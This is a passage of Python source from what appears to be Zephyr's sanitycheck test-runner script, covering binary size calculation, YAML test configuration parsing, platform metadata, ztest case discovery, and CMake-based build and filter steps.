        self.is_xip = (len(is_xip_output) != 0)

        self.filename = filename
        self.sections = []
        self.rom_size = 0
        self.ram_size = 0
        self.extra_sections = extra_sections

        self._calculate_sizes()

    def get_ram_size(self):
        """Get the amount of RAM the application will use up on the device

        @return amount of RAM, in bytes
        """
        return self.ram_size

    def get_rom_size(self):
        """Get the size of the data that this application uses on device's flash

        @return amount of ROM, in bytes
        """
        return self.rom_size

    def unrecognized_sections(self):
        """Get a list of sections inside the binary that weren't recognized

        @return list of unrecognized section names
        """
        slist = []
        for v in self.sections:
            if not v["recognized"]:
                slist.append(v["name"])
        return slist

    def _calculate_sizes(self):
        """ Calculate RAM and ROM usage by section """
        objdump_command = "objdump -h " + self.filename
        objdump_output = subprocess.check_output(
            objdump_command, shell=True).decode("utf-8").splitlines()

        for line in objdump_output:
            words = line.split()

            if not words:  # Skip lines that are too short
                continue

            index = words[0]
            if not index[0].isdigit():  # Skip lines that do not start
                continue  # with a digit

            name = words[1]  # Skip lines with section names
            if name[0] == '.':  # starting with '.'
                continue

            # TODO this doesn't actually reflect the size in flash or RAM as
            # it doesn't include linker-imposed padding between sections.
            # It is close though.
            size = int(words[2], 16)
            if size == 0:
                continue

            load_addr = int(words[4], 16)
            virt_addr = int(words[3], 16)

            # Add section to memory use totals (for both non-XIP and XIP scenarios)
            # Unrecognized section names are not included in the calculations.
            recognized = True
            if name in SizeCalculator.alloc_sections:
                self.ram_size += size
                stype = "alloc"
            elif name in SizeCalculator.rw_sections:
                self.ram_size += size
                self.rom_size += size
                stype = "rw"
            elif name in SizeCalculator.ro_sections:
                self.rom_size += size
                if not self.is_xip:
                    self.ram_size += size
                stype = "ro"
            else:
                stype = "unknown"
                if name not in self.extra_sections:
                    recognized = False

            self.sections.append({"name": name, "load_addr": load_addr,
                                  "size": size, "virt_addr": virt_addr,
                                  "type": stype, "recognized": recognized})
class SanityConfigParser:
    """Class to read test case files with semantic checking
    """

    def __init__(self, filename, schema):
        """Instantiate a new SanityConfigParser object

        @param filename Source .yaml file to read
        @param schema Schema used by scl to validate the file on load()
        """
        self.data = {}
        self.schema = schema
        self.filename = filename
        self.tests = {}
        self.common = {}

    def load(self):
        """Load and validate the YAML file, filling self.tests/self.common."""
        self.data = scl.yaml_load_verify(self.filename, self.schema)

        if 'tests' in self.data:
            self.tests = self.data['tests']
        if 'common' in self.data:
            self.common = self.data['common']

    def _cast_value(self, value, typestr):
        """Convert *value* (usually a string from YAML) according to *typestr*.

        @param value Raw value from the YAML file
        @param typestr One of "str", "float", "int", "bool", "list[:T]",
            "set[:T]" or "map"
        @return the converted value
        @raise ConfigurationError for an unknown *typestr*
        """
        # Normalize string input once; non-strings pass through unchanged.
        # BUG FIX: previously ``v`` was only bound for str inputs, so a
        # non-string value combined with typestr "str" raised NameError.
        v = value.strip() if isinstance(value, str) else value
        if typestr == "str":
            return v
        elif typestr == "float":
            return float(value)
        elif typestr == "int":
            return int(value)
        elif typestr == "bool":
            # YAML already delivers real booleans; pass through as-is.
            return value
        elif typestr.startswith("list") and isinstance(value, list):
            return value
        elif typestr.startswith("list") and isinstance(value, str):
            vs = v.split()
            if len(typestr) > 4 and typestr[4] == ":":
                # "list:<type>": convert each element after splitting.
                return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
            else:
                return vs
        elif typestr.startswith("set"):
            vs = v.split()
            if len(typestr) > 3 and typestr[3] == ":":
                # "set:<type>": convert each element after splitting.
                return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
            else:
                return set(vs)
        elif typestr.startswith("map"):
            return value
        else:
            # BUG FIX: the message previously interpolated *value* instead
            # of the unknown *typestr* it complains about.
            raise ConfigurationError(
                self.filename, "unknown type '%s'" % typestr)

    def get_test(self, name, valid_keys):
        """Get a dictionary representing the keys/values within a test

        @param name The test in the .yaml file to retrieve data from
        @param valid_keys A dictionary representing the intended semantics
            for this test. Each key in this dictionary is a key that could
            be specified, if a key is given in the .yaml file which isn't in
            here, it will generate an error. Each value in this dictionary
            is another dictionary containing metadata:

                "default" - Default value if not given
                "type" - Data type to convert the text value to. Simple types
                    supported are "str", "float", "int", "bool" which will get
                    converted to respective Python data types. "set" and "list"
                    may also be specified which will split the value by
                    whitespace (but keep the elements as strings). finally,
                    "list:<type>" and "set:<type>" may be given which will
                    perform a type conversion after splitting the value up.
                "required" - If true, raise an error if not defined. If false
                    and "default" isn't specified, a type conversion will be
                    done on an empty string

        @return A dictionary containing the test key-value pairs with
            type conversion and default values filled in per valid_keys
        """
        d = {}
        # Start from the "common" section...
        for k, v in self.common.items():
            d[k] = v

        # ...then merge the per-test section on top of it.
        for k, v in self.tests[name].items():
            if k in d:
                if isinstance(d[k], str):
                    # By default, we just concatenate string values of keys
                    # which appear both in "common" and per-test sections,
                    # but some keys are handled in adhoc way based on their
                    # semantics.
                    if k == "filter":
                        d[k] = "(%s) and (%s)" % (d[k], v)
                    else:
                        d[k] += " " + v
            else:
                d[k] = v

        # Apply defaults, required-key checking and type conversion.
        for k, kinfo in valid_keys.items():
            if k not in d:
                if "required" in kinfo:
                    required = kinfo["required"]
                else:
                    required = False

                if required:
                    raise ConfigurationError(
                        self.filename,
                        "missing required value for '%s' in test '%s'" %
                        (k, name))
                else:
                    if "default" in kinfo:
                        default = kinfo["default"]
                    else:
                        default = self._cast_value("", kinfo["type"])
                    d[k] = default
            else:
                try:
                    d[k] = self._cast_value(d[k], kinfo["type"])
                except ValueError:
                    raise ConfigurationError(
                        self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
                        (kinfo["type"], d[k], k, name))

        return d
class Platform:
    """Metadata describing a single build target (board).

    Maps directly to BOARD when building.
    """

    platform_schema = scl.yaml_load(
        os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
                     "platform-schema.yaml"))

    def __init__(self):
        """Initialize every field to its documented default value."""
        self.name = ""
        self.sanitycheck = True
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = 128
        self.ignore_tags = []
        self.only_tags = []
        self.default = False
        # if no flash size is specified by the board, take a default of 512K
        self.flash = 512
        self.supported = set()
        self.arch = ""
        self.type = "na"
        self.simulation = "na"
        self.supported_toolchains = []
        self.env = []
        self.env_satisfied = True
        self.filter_data = dict()

    def load(self, platform_file):
        """Populate this object from a platform .yaml file."""
        parser = SanityConfigParser(platform_file, self.platform_schema)
        parser.load()
        data = parser.data

        self.name = data['identifier']
        self.sanitycheck = data.get("sanitycheck", True)
        # if no RAM size is specified by the board, take a default of 128K
        self.ram = data.get("ram", 128)
        # if no flash size is specified by the board, take a default of 512K
        self.flash = data.get("flash", 512)

        testing = data.get("testing", {})
        self.ignore_tags = testing.get("ignore_tags", [])
        self.only_tags = testing.get("only_tags", [])
        self.default = testing.get("default", False)

        # "supported" entries may be colon-separated feature chains;
        # flatten them into a single feature set.
        self.supported = {segment
                          for feature in data.get("supported", [])
                          for segment in feature.split(":")}

        self.arch = data['arch']
        self.type = data.get('type', "na")
        self.simulation = data.get('simulation', "na")
        self.supported_toolchains = data.get("toolchain", [])
        self.env = data.get("env", [])
        # Satisfied only when every listed environment variable is set
        # to a non-empty value.
        self.env_satisfied = all(os.environ.get(var) for var in self.env)

    def __repr__(self):
        return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
    # Prevent pytest from collecting subclasses (e.g. TestCase, TestSuite)
    # as if they were unit tests of this script itself.
    __test__ = False
class TestCase(DisablePyTestCollectionMixin):
    """Class representing a test application
    """

    def __init__(self, testcase_root, workdir, name):
        """TestCase constructor.
        This gets called by TestSuite as it finds and reads test yaml files.
        Multiple TestCase instances may be generated from a single testcase.yaml,
        each one corresponds to an entry within that file.
        We need to have a unique name for every single test case. Since
        a testcase.yaml can define multiple tests, the canonical name for
        the test case is <workdir>/<name>.
        @param testcase_root os.path.abspath() of one of the --testcase-root
        @param workdir Sub-directory of testcase_root where the
        .yaml test configuration file was found
        @param name Name of this test case, corresponding to the entry name
        in the test case configuration file. For many test cases that just
        define one test, can be anything and is usually "test". This is
        really only used to distinguish between different cases when
        the testcase.yaml defines multiple tests
        """
        self.source_dir = ""
        self.yamlfile = ""
        # Sub-case names, filled in later by parse_subcases()
        self.cases = []
        self.name = self.get_unique(testcase_root, workdir, name)
        self.id = name
        # The attributes below mirror the keys accepted in testcase.yaml;
        # they are populated by the test suite loader after construction.
        self.type = None
        self.tags = set()
        self.extra_args = None
        self.extra_configs = None
        self.arch_whitelist = None
        self.arch_exclude = None
        self.skip = False
        self.platform_exclude = None
        self.platform_whitelist = None
        self.toolchain_exclude = None
        self.toolchain_whitelist = None
        self.tc_filter = None
        self.timeout = 60
        self.harness = ""
        self.harness_config = {}
        self.build_only = True
        self.build_on_all = False
        self.slow = False
        self.min_ram = -1
        self.depends_on = None
        self.min_flash = -1
        self.extra_sections = None
        self.integration_platforms = []

    @staticmethod
    def get_unique(testcase_root, workdir, name):
        """Build the canonical unique name for a test case.

        @raises SanityCheckException when `name` lacks the mandatory
            "<category>.<subsystem>" dot separator.
        """
        canonical_testcase_root = os.path.realpath(testcase_root)
        if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
            # This is in ZEPHYR_BASE, so include path in name for uniqueness
            # FIXME: We should not depend on path of test for unique names.
            relative_tc_root = os.path.relpath(canonical_testcase_root,
                                               start=canonical_zephyr_base)
        else:
            relative_tc_root = ""
        # workdir can be "."
        unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
        check = name.split(".")
        if len(check) < 2:
            raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
                    """
                                       )
        return unique

    @staticmethod
    def scan_file(inf_name):
        """Scan one C source file for ztest suite/case declarations.

        @param inf_name Path of the source file to scan
        @return (matches, warnings): matches is the list of sub-case names
            with the leading "test_" stripped, or None when no
            ztest_test_suite() declaration is found; warnings is a string
            describing suspicious content, or None
        @raises ValueError when a suite is declared but ztest_run_test_suite()
            is never called
        """
        suite_regex = re.compile(
            # do not match until end-of-line, otherwise we won't allow
            # stc_regex below to catch the ones that are declared in the same
            # line--as we only search starting the end of this match
            br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
            re.MULTILINE)
        stc_regex = re.compile(
            br"^\s*"  # empty space at the beginning is ok
            # catch the case where it is declared in the same sentence, e.g:
            #
            # ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
            br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
            # Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
            br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
            # Consume the argument that becomes the extra testcase
            br"\(\s*"
            br"(?P<stc_name>[a-zA-Z0-9_]+)"
            # _setup_teardown() variant has two extra arguments that we ignore
            br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
            br"\s*\)",
            # We don't check how it finishes; we don't care
            re.MULTILINE)
        suite_run_regex = re.compile(
            br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
            re.MULTILINE)
        achtung_regex = re.compile(
            br"(#ifdef|#endif)",
            re.MULTILINE)
        warnings = None
        with open(inf_name) as inf:
            # mmap setup differs between Windows and POSIX
            if os.name == 'nt':
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
            else:
                mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
                             'offset': 0}
            with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
                suite_regex_match = suite_regex.search(main_c)
                if not suite_regex_match:
                    # can't find ztest_test_suite, maybe a client, because
                    # it includes ztest.h
                    return None, None
                suite_run_match = suite_run_regex.search(main_c)
                if not suite_run_match:
                    raise ValueError("can't find ztest_run_test_suite")
                # Preprocessor conditionals between the declaration and the
                # run call can hide cases from this static scan, so flag them.
                achtung_matches = re.findall(
                    achtung_regex,
                    main_c[suite_regex_match.end():suite_run_match.start()])
                if achtung_matches:
                    warnings = "found invalid %s in ztest_test_suite()" \
                               % ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
                _matches = re.findall(
                    stc_regex,
                    main_c[suite_regex_match.end():suite_run_match.start()])
                for match in _matches:
                    if not match.decode().startswith("test_"):
                        warnings = "Found a test that does not start with test_"
                matches = [match.decode().replace("test_", "", 1) for match in _matches]
                return matches, warnings

    def scan_path(self, path):
        """Scan all C sources under `path` and collect ztest sub-case names."""
        subcases = []
        for filename in glob.glob(os.path.join(path, "src", "*.c*")):
            try:
                _subcases, warnings = self.scan_file(filename)
                if warnings:
                    logger.error("%s: %s" % (filename, warnings))
                    raise SanityRuntimeError("%s: %s" % (filename, warnings))
                if _subcases:
                    subcases += _subcases
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        # NOTE(review): warnings from sources directly under `path` are only
        # logged, while those from src/ above are fatal — confirm intentional.
        for filename in glob.glob(os.path.join(path, "*.c")):
            try:
                _subcases, warnings = self.scan_file(filename)
                if warnings:
                    logger.error("%s: %s" % (filename, warnings))
                if _subcases:
                    subcases += _subcases
            except ValueError as e:
                logger.error("%s: can't find: %s" % (filename, e))
        return subcases

    def parse_subcases(self, test_path):
        """Populate self.cases with "<id>.<subcase>" names found under
        test_path; fall back to the bare id when nothing was discovered."""
        results = self.scan_path(test_path)
        for sub in results:
            name = "{}.{}".format(self.id, sub)
            self.cases.append(name)
        if not results:
            self.cases.append(self.id)

    def __str__(self):
        return self.name
class TestInstance(DisablePyTestCollectionMixin):
    """Class representing the execution of a particular TestCase on a platform
    @param test The TestCase object we want to build/execute
    @param platform Platform object that we want to build and run against
    @param base_outdir Base directory for all test results. The actual
    out directory used is <outdir>/<platform>/<test case name>
    """

    def __init__(self, testcase, platform, outdir):
        self.testcase = testcase
        self.platform = platform
        # Execution state, updated as the instance moves through the pipeline
        self.status = None
        self.reason = "Unknown"
        self.metrics = dict()
        self.handler = None
        self.outdir = outdir
        # Unique name and build directory: <platform>/<testcase name>
        self.name = os.path.join(platform.name, testcase.name)
        self.build_dir = os.path.join(outdir, platform.name, testcase.name)
        self.build_only = True
        self.run = False
        # Per-subcase verdicts, keyed by subcase name
        self.results = {}

    def __lt__(self, other):
        # Order instances by their unique name
        return self.name < other.name

    # Global testsuite parameters
    def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=None):
        """Decide whether this instance will only be built or also run.

        Sets self.build_only and self.run.

        @param build_only True when --build-only was requested globally
        @param enable_slow True when tests marked "slow" may be executed
        @param device_testing True when real hardware is attached
        @param fixtures Fixtures supplied on the command line; a harness
            fixture must appear here for a console/ztest test to run
        """
        # Fix: use a None sentinel instead of a mutable default argument.
        if fixtures is None:
            fixtures = []
        # right now we only support building on windows. running is still work
        # in progress.
        if os.name == 'nt':
            self.build_only = True
            self.run = False
            return
        _build_only = True
        # we asked for build-only on the command line
        if build_only or self.testcase.build_only:
            self.build_only = True
            self.run = False
            return
        # Do not run slow tests:
        skip_slow = self.testcase.slow and not enable_slow
        if skip_slow:
            self.build_only = True
            self.run = False
            return
        # Runnable when it is a unit test, targets a native or simulated
        # platform, or real hardware is available.
        runnable = bool(self.testcase.type == "unit" or \
                        self.platform.type == "native" or \
                        self.platform.simulation in ["nsim", "renode", "qemu"] or \
                        device_testing)
        # The simulator binaries must actually be installed on this host.
        if self.platform.simulation == "nsim":
            if not find_executable("nsimdrv"):
                runnable = False
        if self.platform.simulation == "renode":
            if not find_executable("renode"):
                runnable = False
        # console harness allows us to run the test and capture data.
        if self.testcase.harness in [ 'console', 'ztest']:
            # if we have a fixture that is also being supplied on the
            # command-line, then we need to run the test, not just build it.
            fixture = self.testcase.harness_config.get('fixture')
            if fixture:
                _build_only = fixture not in fixtures
            else:
                _build_only = False
        elif self.testcase.harness:
            # Any other harness needs external infrastructure: build only.
            _build_only = True
        else:
            _build_only = False
        self.build_only = not (not _build_only and runnable)
        self.run = not self.build_only
        return

    def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=None):
        """Write the extra Kconfig fragment (testcase_extra.conf) combining
        the testcase's extra_configs with coverage/ASAN/UBSAN options.

        @return The content written to the overlay file
        """
        # Fix: use a None sentinel instead of a mutable default argument.
        if coverage_platform is None:
            coverage_platform = []
        # Create this in a "sanitycheck/" subdirectory otherwise this
        # will pass this overlay to kconfig.py *twice* and kconfig.cmake
        # will silently give that second time precedence over any
        # --extra-args=CONFIG_*
        subdir = os.path.join(self.build_dir, "sanitycheck")
        os.makedirs(subdir, exist_ok=True)
        file = os.path.join(subdir, "testcase_extra.conf")
        with open(file, "w") as f:
            content = ""
            if self.testcase.extra_configs:
                content = "\n".join(self.testcase.extra_configs)
            if enable_coverage:
                if platform.name in coverage_platform:
                    content = content + "\nCONFIG_COVERAGE=y"
                    content = content + "\nCONFIG_COVERAGE_DUMP=y"
            if enable_asan:
                if platform.type == "native":
                    content = content + "\nCONFIG_ASAN=y"
            if enable_ubsan:
                if platform.type == "native":
                    content = content + "\nCONFIG_UBSAN=y"
            f.write(content)
        return content

    def calculate_sizes(self):
        """Get the RAM/ROM sizes of a test case.
        This can only be run after the instance has been executed by
        MakeGenerator, otherwise there won't be any binaries to measure.
        @return A SizeCalculator object
        """
        fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
        fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
        # Ignore intermediate pre-link artifacts
        fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
        if len(fns) != 1:
            raise BuildError("Missing/multiple output ELF binary")
        return SizeCalculator(fns[0], self.testcase.extra_sections)

    def fill_results_by_status(self):
        """Fills results according to self.status
        The method is used to propagate the instance level status
        to the test cases inside. Useful when the whole instance is skipped
        and the info is required also at the test cases level for reporting.
        Should be used with caution, e.g. should not be used
        to fill all results with passes
        """
        status_to_verdict = {
            'skipped': 'SKIP',
            'error': 'BLOCK',
            'failure': 'FAILED'
        }
        for k in self.results:
            self.results[k] = status_to_verdict[self.status]

    def __repr__(self):
        return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
    """Thin wrapper around the cmake executable: configure and build one
    test case for one platform, capturing output into a per-build log.

    NOTE(review): run_cmake() reads self.warnings_as_errors, self.cmake_only
    and self.instance, which are not set here — they are provided by the
    ProjectBuilder subclass; confirm before using CMake directly.
    """

    config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')

    def __init__(self, testcase, platform, source_dir, build_dir):
        self.cwd = None
        self.capture_output = True
        # Parsed build artifacts, filled by parse_generated() in subclasses
        self.defconfig = {}
        self.cmake_cache = {}
        self.instance = None
        self.testcase = testcase
        self.platform = platform
        self.source_dir = source_dir
        self.build_dir = build_dir
        self.log = "build.log"
        self.generator = None
        self.generator_cmd = None

    def parse_generated(self):
        """Hook for subclasses to parse generated build files; the base
        implementation resets defconfig and returns no filter data."""
        self.defconfig = {}
        return {}

    def run_build(self, args=None):
        """Invoke `cmake` to build the already-configured tree.

        @param args Extra command-line arguments for cmake
        @return A results dict with "returncode"/"instance" (and "msg" on
            success), or None when the build passed but produced no output.
            Sets self.instance.status/reason as a side effect; an
            FLASH/RAM/SRAM overflow in the log is treated as a skip.
        """
        # None sentinel avoids the shared mutable-default pitfall.
        if args is None:
            args = []
        logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
        cmake_args = []
        cmake_args.extend(args)
        cmake = shutil.which('cmake')
        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        results = {}
        if p.returncode == 0:
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            self.instance.status = "passed"
            results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
            if out:
                log_msg = out.decode(sys.getdefaultencoding())
                with open(os.path.join(self.build_dir, self.log), "a") as log:
                    log.write(log_msg)
            else:
                # NOTE(review): a successful but silent build returns None,
                # which callers may treat as failure — confirm intended.
                return None
        else:
            # A real error occurred, raise an exception
            if out:
                log_msg = out.decode(sys.getdefaultencoding())
                with open(os.path.join(self.build_dir, self.log), "a") as log:
                    log.write(log_msg)
                if log_msg:
                    res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
                    if res:
                        logger.debug("Test skipped due to {} Overflow".format(res[0]))
                        self.instance.status = "skipped"
                        self.instance.reason = "{} overflow".format(res[0])
                    else:
                        self.instance.status = "error"
                        self.instance.reason = "Build failure"
            results = {
                "returncode": p.returncode,
                "instance": self.instance,
            }
        return results

    def run_cmake(self, args=None):
        """Configure the build tree with cmake.

        @param args Extra `-D` definitions (quotes are stripped)
        @return A results dict: {"msg", "filter"} on success, otherwise
            {"returncode"}; sets self.instance.status/reason on failure
        """
        # None sentinel avoids the shared mutable-default pitfall.
        if args is None:
            args = []
        if self.warnings_as_errors:
            ldflags = "-Wl,--fatal-warnings"
            cflags = "-Werror"
            aflags = "-Wa,--fatal-warnings"
        else:
            ldflags = cflags = aflags = ""
        logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
        cmake_args = [
            f'-B{self.build_dir}',
            f'-S{self.source_dir}',
            f'-DEXTRA_CFLAGS="{cflags}"',
            # Bug fix: the closing double quote was missing here, producing a
            # malformed -DEXTRA_AFLAGS argument (compare CFLAGS/LDFLAGS).
            f'-DEXTRA_AFLAGS="{aflags}"',
            f'-DEXTRA_LDFLAGS="{ldflags}"',
            f'-G{self.generator}'
        ]
        if self.cmake_only:
            cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
        args = ["-D{}".format(a.replace('"', '')) for a in args]
        cmake_args.extend(args)
        cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
        cmake_args.extend(cmake_opts)
        logger.debug("Calling cmake with arguments: {}".format(cmake_args))
        cmake = shutil.which('cmake')
        cmd = [cmake] + cmake_args
        kwargs = dict()
        if self.capture_output:
            kwargs['stdout'] = subprocess.PIPE
            # CMake sends the output of message() to stderr unless it's STATUS
            kwargs['stderr'] = subprocess.STDOUT
        if self.cwd:
            kwargs['cwd'] = self.cwd
        p = subprocess.Popen(cmd, **kwargs)
        out, _ = p.communicate()
        if p.returncode == 0:
            filter_results = self.parse_generated()
            msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
            logger.debug(msg)
            results = {'msg': msg, 'filter': filter_results}
        else:
            self.instance.status = "error"
            self.instance.reason = "Cmake build failure"
            logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
            results = {"returncode": p.returncode}
        if out:
            with open(os.path.join(self.build_dir, self.log), "a") as log:
                log_msg = out.decode(sys.getdefaultencoding())
                log.write(log_msg)
        return results
class FilterBuilder(CMake):
    # CMake wrapper used for the configure-only "filter" pass: after cmake
    # runs, parse_generated() evaluates the testcase filter expression
    # against the generated Kconfig/CMake cache data.

    def __init__(self, testcase, platform, source_dir, build_dir):
        super().__init__(testcase, platform, source_dir, build_dir)
        self.log = "config-sanitycheck.log"

    def parse_generated(self):
        """Parse .config and CMakeCache.txt from the build tree and evaluate
        the testcase's filter expression against them.

        @return When the testcase has a filter: a one-entry dict mapping
            "<platform>/<testcase>" to True when the instance should be
            FILTERED OUT (expression false) or False when it should be kept.
            Otherwise the raw filter_data dict, also stored on the platform.
        """
        if self.platform.name == "unit_testing":
            return {}
        cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
        defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
        # Collect CONFIG_* symbols from the generated .config
        with open(defconfig_path, "r") as fp:
            defconfig = {}
            for line in fp.readlines():
                m = self.config_re.match(line)
                if not m:
                    if line.strip() and not line.startswith("#"):
                        sys.stderr.write("Unrecognized line %s\n" % line)
                    continue
                defconfig[m.group(1)] = m.group(2).strip()
        self.defconfig = defconfig
        cmake_conf = {}
        try:
            cache = CMakeCache.from_file(cmake_cache_path)
        except FileNotFoundError:
            cache = {}
        for k in iter(cache):
            cmake_conf[k.name] = k.value
        self.cmake_cache = cmake_conf
        # Build the evaluation namespace: environment, Kconfig symbols and
        # CMake cache entries, plus architecture/platform identifiers.
        filter_data = {
            "ARCH": self.platform.arch,
            "PLATFORM": self.platform.name
        }
        filter_data.update(os.environ)
        filter_data.update(self.defconfig)
        filter_data.update(self.cmake_cache)
        # Devicetree data (if generated) is made available to the expression
        edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
        if self.testcase and self.testcase.tc_filter:
            try:
                if os.path.exists(edt_pickle):
                    with open(edt_pickle, 'rb') as f:
                        edt = pickle.load(f)
                else:
                    edt = None
                res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
            except (ValueError, SyntaxError) as se:
                sys.stderr.write(
                    "Failed processing %s\n" % self.testcase.yamlfile)
                raise se
            # True means "filter this instance out" (expression was false)
            if not res:
                return {os.path.join(self.platform.name, self.testcase.name): True}
            else:
                return {os.path.join(self.platform.name, self.testcase.name): False}
        else:
            self.platform.filter_data = filter_data
            return filter_data
class ProjectBuilder(FilterBuilder):
    # Drives one TestInstance through its pipeline stages:
    # cmake -> build -> run -> report -> cleanup (see process()).
    # NOTE(review): process() and report_out() rely on the module-level
    # `pipeline` queue and `report_lock` — confirm they exist at call time.

    def __init__(self, suite, instance, **kwargs):
        super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
        self.log = "build.log"
        self.instance = instance
        self.suite = suite
        # Options forwarded from the command line via TestSuite
        self.lsan = kwargs.get('lsan', False)
        self.asan = kwargs.get('asan', False)
        self.ubsan = kwargs.get('ubsan', False)
        self.valgrind = kwargs.get('valgrind', False)
        self.extra_args = kwargs.get('extra_args', [])
        self.device_testing = kwargs.get('device_testing', False)
        self.cmake_only = kwargs.get('cmake_only', False)
        self.cleanup = kwargs.get('cleanup', False)
        self.coverage = kwargs.get('coverage', False)
        self.inline_logs = kwargs.get('inline_logs', False)
        self.generator = kwargs.get('generator', None)
        self.generator_cmd = kwargs.get('generator_cmd', None)
        self.verbose = kwargs.get('verbose', None)
        self.warnings_as_errors = kwargs.get('warnings_as_errors', True)

    @staticmethod
    def log_info(filename, inline_logs):
        """Show a log file to the user: dump its contents when inline_logs
        is set, otherwise just print its (highlighted) path."""
        filename = os.path.abspath(os.path.realpath(filename))
        if inline_logs:
            logger.info("{:-^100}".format(filename))
            try:
                with open(filename) as fp:
                    data = fp.read()
            except Exception as e:
                data = "Unable to read log data (%s)\n" % (str(e))
            logger.error(data)
            logger.info("{:-^100}".format(filename))
        else:
            logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)

    def log_info_file(self, inline_logs):
        """Pick the most relevant log for this instance (valgrind, handler,
        device, else build) and hand it to log_info()."""
        build_dir = self.instance.build_dir
        h_log = "{}/handler.log".format(build_dir)
        b_log = "{}/build.log".format(build_dir)
        v_log = "{}/valgrind.log".format(build_dir)
        d_log = "{}/device.log".format(build_dir)
        if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
            self.log_info("{}".format(v_log), inline_logs)
        elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
            self.log_info("{}".format(h_log), inline_logs)
        elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
            self.log_info("{}".format(d_log), inline_logs)
        else:
            self.log_info("{}".format(b_log), inline_logs)

    def setup_handler(self):
        """Attach the appropriate execution handler to the instance, based
        on platform simulation/type and testcase type. Leaves the handler
        unset when no execution method applies."""
        instance = self.instance
        args = []
        # FIXME: Needs simplification
        if instance.platform.simulation == "qemu":
            instance.handler = QEMUHandler(instance, "qemu")
            args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
            instance.handler.call_make_run = True
        elif instance.testcase.type == "unit":
            instance.handler = BinaryHandler(instance, "unit")
            instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
            if self.coverage:
                args.append("COVERAGE=1")
        elif instance.platform.type == "native":
            handler = BinaryHandler(instance, "native")
            # Sanitizer/valgrind/coverage options only apply to native runs
            handler.asan = self.asan
            handler.valgrind = self.valgrind
            handler.lsan = self.lsan
            handler.ubsan = self.ubsan
            handler.coverage = self.coverage
            handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
            instance.handler = handler
        elif instance.platform.simulation == "nsim":
            if find_executable("nsimdrv"):
                instance.handler = BinaryHandler(instance, "nsim")
                instance.handler.call_make_run = True
        elif instance.platform.simulation == "renode":
            if find_executable("renode"):
                instance.handler = BinaryHandler(instance, "renode")
                instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
                instance.handler.call_make_run = True
        elif self.device_testing:
            instance.handler = DeviceHandler(instance, "device")
        if instance.handler:
            instance.handler.args = args
            instance.handler.generator_cmd = self.generator_cmd
            instance.handler.generator = self.generator

    def process(self, message):
        """Execute one pipeline stage for this instance.

        @param message Dict with an "op" key: one of "cmake", "build",
            "run", "report" or "cleanup". Each stage enqueues the next
            stage on the module-level `pipeline` queue.
        """
        op = message.get('op')
        if not self.instance.handler:
            self.setup_handler()
        # The build process, call cmake and build with configured generator
        if op == "cmake":
            results = self.cmake()
            if self.instance.status in ["failed", "error"]:
                pipeline.put({"op": "report", "test": self.instance})
            elif self.cmake_only:
                pipeline.put({"op": "report", "test": self.instance})
            else:
                # A True filter result means this instance was filtered out
                if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
